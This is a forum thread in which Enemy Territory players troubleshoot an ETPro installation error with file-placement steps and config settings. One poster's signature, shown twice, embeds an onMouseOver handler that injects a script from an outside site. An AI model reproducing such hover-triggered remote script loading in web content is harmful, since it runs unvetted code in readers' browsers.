the 'BG_IndexForString: unkown token 'NOT'' bug

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

Rain

Post by Rain »

Move older etpro pk3s from the etpro directory to someplace that ET won't read them before creating the server. If there's more than one pk3, ET won't necessarily pick the correct one to extract files from.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Subspecie

Post by Subspecie »

This is the answer!:
Sauron|EFG wrote:If you host a game you also need qagame_mp_x86.dll/so, and that isn't included in the PK3 you auto-download.

http://bani.anime.net/etpro/download.html
BUT: I get this error about server not installed properly or so.. I saw another dude in here also got that error, and he got an answer.. to remove all the old etpro-x_x_xx.pk3 files from the server..

but I'm quite dumb.. so I don't know wich is "the server"? is it the etpro folder? :oops:
Badhabit

Post by Badhabit »

Subspecie wrote:This is the answer!:
Sauron|EFG wrote:If you host a game you also need qagame_mp_x86.dll/so, and that isn't included in the PK3 you auto-download.

BUT: I get this error about server not installed properly or so.. I saw another dude in here also got that error, and he got an answer.. to remove all the old etpro-x_x_xx.pk3 files from the server..

but I'm quite dumb.. so I don't know wich is "the server"? is it the etpro folder? :oops:
1. Stop/shutdown the server.
2. Rename or delete the /etpro folder from the server.
3. Upload/unzip 3.1.0 OR 3.0.1 To your /et "root" directory.(same place your old /etpro folder was and your /etmain folder is)
4. Restart the server with the "+set fs_game etpro" added to your Command line/shortcut
{Zer0}'s House of Torment 67.19.67.118:27960
{Zer0}'s RTCW server 67.19.67.119:27960
Now Lets Go Kick Some ASS
And thats an Order.
Subspecie

Post by Subspecie »

okay.. I just moved the the old etpro-x_x_xx.pk3 files into another folder, and that worked.. I dont know why, but renaming the folder and unzipping etpro-3_1_0.pk3 in a new etpro folder, just fucked the game up :S

Thanks for your help guys :D
Backdraft11

Post by Backdraft11 »

Okay I did:

-deleted all previous etpro-x_x_xx.pk3 files except for etpro-3_1_0.pk3
-extracked the two *.dll files from etpro-3_1_0.pk3 to etpro folder

I still get this error/bug, even while trying to run a dedicated server (I tried non-dedicated at first). And yes, I have added the set fs_game etpro cmd line.
Deus

Post by Deus »

The Lugerer

Post by The Lugerer »

i've tried everything listed here, even just totally deleting the etpro folder, yet i still get the same unknown token error when i try to load my own map on a non-dedicated server (so just in the client). and when i copied qagame_mp_x86.dll/so from the latest etpro zip download into etmain and try to load a map in etpro, it says something like

wolfet was expecting or needs....."et2.60 x86 Mar. 10 2005, not ,"

exactly how i typed that with the comma at the end...

anyway, in etmain i can load maps fine, just not in etpro. oh and i have also tried totally reinstalling ET, and the problem consisted.

thanks for the help
gotenks

Post by gotenks »

are you using etded.exe to start a server or et.exe, you cannot use et.exe, you must use a dedicated server... it's not a bug
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
morita

Post by morita »

Hi.

I'm running ET Pro on Debian GNU/Linux unstable, and I got same problem.

I found another solution to fix this problem:

1) Extract *.so files to etpro directory from etpro-3_2_1.pk3.
You can extract with:
$ unzip etpro-3_2_1.pk3 cgame.mp.i386.so ui.mp.i386.so
And make sure that cgame.mp.i386.so, ui.mp.i386.so, qagame.mp.i386.so(if you need) is ET Pro's one.
If something is wrong, above files will be overwrite by etmain's one.

2) Put following three lines to config:
seta cl_lastVersioncgame "ET 2.60 linux-i386 Mar 10 2005"
seta cl_lastVersionui "ET 2.60 linux-i386 Mar 10 2005"
seta cl_lastVersionqagame "ET 2.60 linux-i386 Mar 10 2005"

(I think these value are depend on your platform)

I have examine what cl_lastVersioncgame, cl_lastVersionui and cl_lastVersionqagame means, but I can't get any information.

Default value of cl_last... variables is "(uninitialized)".
When I install ET Pro manually(by extracting etpro-3_2_1.zip), and run with +set fs_game etpro option, the value "(uninitialized)" will be set to cl_last... variables. And I got 'BG_IndexForString' error when loading any map.
When I install ET Pro automatically(by connect to existing ET Pro server), the value "ET 2.60 linux-i386 Mar 10 2005" will be set to cl_last... variables. And it works correctly. No 'BG_IndexForString' error is occured.

Hope it helps,
jump3r

Post by jump3r »

someone should fix this "bug" anyway.

/set old 1
The Necromancer

Post by The Necromancer »

lol holy bump, reviving dead is my buisness :twisted:
anyway this is NOT bug at all, just error that MUST happen on bad installation
if this is 'fixed' other things will go wrong instead :roll:
Hi! I'm a .signature *virus*! Copy me into your ~/.signature to help me spread!
jump3r

Post by jump3r »

The Necromancer wrote:lol holy bump, reviving dead is my buisness :twisted:
anyway this is NOT bug at all, just error that MUST happen on bad installation
if this is 'fixed' other things will go wrong instead :roll:
it happened to me today, because of 'clean et 2.60b + etpro 3.2.6 installation'. i found this topic, extracted these 3 .dll files and it works.

however, it's pretty stupid TBFH. not everyone knows etpro forum and also not everyone understand to this.
WeblionX

Post by WeblionX »

I do believe the install files tell you to extract the dlls. Perhaps the wiki should be linked to in the readme of the next version?
Got any old idtech3 tutorials you made or saved? Send them my way.
Rain

Post by Rain »

WeblionX wrote:Perhaps the wiki should be linked to in the readme of the next version?
Agree. The wiki is the closest thing to real documentation we have, but it's not flaunted very heavily.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Lagger

Post by Lagger »

In the true spirit of a wiki, a template suggesting someone should add a link to the wiki, should be added to the readme file.